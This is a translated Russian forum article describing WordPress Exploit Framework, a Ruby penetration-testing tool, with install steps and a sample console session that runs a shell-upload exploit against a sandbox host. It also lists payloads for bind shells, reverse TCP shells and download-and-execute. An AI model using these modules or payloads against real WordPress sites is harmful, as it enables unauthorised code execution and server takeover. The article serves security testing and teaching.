• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья WordPress Exploit Framework

27259

WordPress Exploit Framework является структурой Ruby для разработки и использования модулей, которые помогают в пентесте сайтов и систем на базе WordPress.

Скачать wordpress-exploit-framework

Требования

Убедитесь в том, что на вашей системе установлен Ruby 2.2.x, и после установите все необходимые зависимости с помощью открытия командной строки/терминала в директории WPXF и выполнения команды bundle install

Если bundler отсутствует в вашей системе, вы можете установить его, запустив gem install bundler

Убедитесь, что у вас есть все инструменты, необходимые для компиляции C расширения:
Код:
sudo apt-get install build-essential patch
Также, убедитесь, что в вашей системе установлены файлы заголовков разработки:
Код:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev
Как использовать WordPress Exploit Framework ?

Откройте командную строку/терминал в директории, в которую вы загрузили WordPress Exploit Framework, и запустите его с помощью выполнения команды ruby wpxf.rb

После загрузки вам будет предложена подсказка wpxf, в которой вы можете искать модули с помощью команды search или загружать модуль с помощью команды command use. Загрузка модуля в вашу среду позволит вам установить опции с помощью команды set, и посмотреть информацию о модуле, используя команду infoНиже приведен пример того, как следует загружать symposium_shell_upload эксплойт модуль, настраивать опции модуля и пейлоад, а также запускать эксплойт против определенной цели.
Код:
wpxf > use exploit/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::payloads::Exec:0x434d078>
wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
В чем разница между вспомогательным модулем и эксплойт модулем?

Вспомогательные модули не позволяют вам запускать пейлоады на целевой машине, но вместо этого они позволяют извлекать информацию из цели, повышать привилегии или предоставлять функции отказа в обслуживании.

Эксплойт модули требуют от вас указать пейлоад, который впоследствии будет извлечен на целевой машине, позволяя вам запускать произвольный код для извлечения информации из машины, устанавливать удаленную оболочку или что-либо еще, что вы хотите сделать в контексте веб-сервера.
Какие пейлоады доступны?
  • bind_php: загружает скрипт, который будет привязываться к определенному порту, и разрешает WPXF устанавливать удаленную оболочку.
  • custom: загружает и выполняет пользовательский PHP скрипт.
  • download_exec: загружает и запускает удаленный исполняемый файл..
  • exec: запускает команду оболочки на удаленном сервере и возвращает результат в сеанс WPXF.
  • reverse_tcp: загружает скрипт, который установит обратную TCP-оболочку.
Все эти пейлоады, за исключением custom , удаляют сами себя после того, как будут выполнены, для того, чтобы они не оставались лежащими без дела на целевой машине после использования или в том случае, если они используются для установки оболочки, которая не работает.

Перевод: Анна Давыдова
Источник:
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!